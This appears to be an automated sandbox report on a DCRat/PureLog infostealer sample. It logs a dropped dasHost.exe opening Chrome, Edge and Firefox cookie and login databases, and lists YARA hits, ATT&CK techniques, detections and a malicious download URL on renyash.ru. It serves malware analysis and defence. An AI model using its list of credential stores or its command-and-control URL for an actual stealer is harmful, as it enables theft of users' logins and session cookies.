                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000004.00000002.1824772825.0000000012B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: HyperPortContainerproviderinto.exe PID: 3168, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: ZZ2sTsJFrt.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.537e723.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.6a3e723.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.537e723.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.6a3e723.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.HyperPortContainerproviderinto.exe.4f0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1677180578.0000000005330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1676672997.00000000069F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1686573197.00000000004F2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: ZZ2sTsJFrt.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.537e723.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.6a3e723.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.537e723.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.6a3e723.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.HyperPortContainerproviderinto.exe.4f0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts141
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		11
                                    Disable or Modify Tools                                    		1
                                    OS Credential Dumping                                    		1
                                    System Time Discovery                                    		Remote Services1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Exploitation for Client Execution                                    		1
                                    DLL Side-Loading                                    		11
                                    Process Injection                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory3
                                    File and Directory Discovery                                    		Remote Desktop Protocol1
                                    Data from Local System                                    		2
                                    Non-Application Layer Protocol                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts2
                                    Command and Scripting Interpreter                                    		Logon Script (Windows)Logon Script (Windows)3
                                    Obfuscated Files or Information                                    		Security Account Manager167
                                    System Information Discovery                                    		SMB/Windows Admin Shares1
                                    Clipboard Data                                    		12
                                    Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                                    Software Packing                                    		NTDS361
                                    Security Software Discovery                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets1
                                    Process Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts123
                                    Masquerading                                    		Cached Domain Credentials261
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                                    Virtualization/Sandbox Evasion                                    		DCSync1
                                    Application Window Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                    Process Injection                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581724 Sample: ZZ2sTsJFrt.exe Startdate: 28/12/2024 Architecture: WINDOWS Score: 100 82 048038cm.renyash.ru 2->82 94 Suricata IDS alerts for network traffic 2->94 96 Antivirus detection for URL or domain 2->96 98 Antivirus detection for dropped file 2->98 100 16 other signatures 2->100 11 ZZ2sTsJFrt.exe 3 10 2->11         started        14 svchost.exe 2->14         started        signatures3 process4 dnsIp5 78 C:\...\HyperPortContainerproviderinto.exe, PE32 11->78 dropped 80 GgQkil7dD38i66IF6C...sB0R1MTAIce7pdb.vbe, data 11->80 dropped 17 wscript.exe 1 11->17         started        86 127.0.0.1 unknown unknown 14->86 file6 process7 signatures8 88 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->88 90 Suspicious execution chain found 17->90 20 cmd.exe 1 17->20         started        22 conhost.exe 17->22         started        24 WmiPrvSE.exe 17->24         started        process9 process10 26 HyperPortContainerproviderinto.exe 3 23 20->26         started        30 conhost.exe 20->30         started        file11 62 C:\Users\user\Desktop\vqImhKDh.log, PE32 26->62 dropped 64 C:\Users\user\Desktop\kKNOcijE.log, PE32 26->64 dropped 66 C:\Users\user\Desktop\kCewxyIz.log, PE32 26->66 dropped 68 9 other malicious files 26->68 dropped 102 Multi AV Scanner detection for dropped file 26->102 104 Adds a directory exclusion to Windows Defender 26->104 106 Drops executable to a common third party application directory 26->106 32 cmd.exe 26->32         started        34 powershell.exe 23 26->34         started        37 powershell.exe 23 26->37         started        39 16 other processes 26->39 signatures12 process13 signatures14 41 dasHost.exe 32->41         started        46 conhost.exe 32->46         started        58 2 other processes 32->58 92 Loading BitLocker PowerShell Module 34->92 48 conhost.exe 34->48         started        50 conhost.exe 37->50         started        52 conhost.exe 39->52         started        54 conhost.exe 39->54         started        56 conhost.exe 39->56         started        60 12 other processes 39->60 process15 dnsIp16 84 048038cm.renyash.ru 104.21.38.84, 49734, 49735, 49737 CLOUDFLARENETUS United States 41->84 70 C:\Users\user\Desktop\ufMwPuFo.log, PE32 41->70 dropped 72 C:\Users\user\Desktop\kwtgfRAG.log, PE32 41->72 dropped 74 C:\Users\user\Desktop\iczfvMBI.log, PE32 41->74 dropped 76 3 other malicious files 41->76 dropped 108 Tries to harvest and steal browser information (history, passwords, etc) 41->108 file17 signatures18

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    ZZ2sTsJFrt.exe70%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    ZZ2sTsJFrt.exe53%VirustotalBrowse
                                    ZZ2sTsJFrt.exe100%AviraVBS/Runner.VPG
                                    ZZ2sTsJFrt.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.bat100%AviraBAT/Delbat.C
                                    C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\ProgramData\ssh\AaHCyFZRuOMjGDqdgJ.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\Default\Pictures\AaHCyFZRuOMjGDqdgJ.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\AXpVrZKc.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\EZcCRmIO.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\KRFbuSND.log8%ReversingLabs
                                    C:\Users\user\Desktop\MjEjEgzx.log8%ReversingLabs
                                    C:\Users\user\Desktop\VVwrSJqk.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\cYVGOFtR.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\iczfvMBI.log25%ReversingLabs
                                    C:\Users\user\Desktop\kCewxyIz.log29%ReversingLabsWin32.Trojan.Generic
                                    C:\Users\user\Desktop\kKNOcijE.log25%ReversingLabs
                                    C:\Users\user\Desktop\kwtgfRAG.log29%ReversingLabsWin32.Trojan.Generic
                                    C:\Users\user\Desktop\ufMwPuFo.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\vqImhKDh.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://048038cm.renyash.ru/pipepacketprocessGeneratordownloads.php100%Avira URL Cloudmalware

                                    Domains and IPs

                                    Contacted Domains

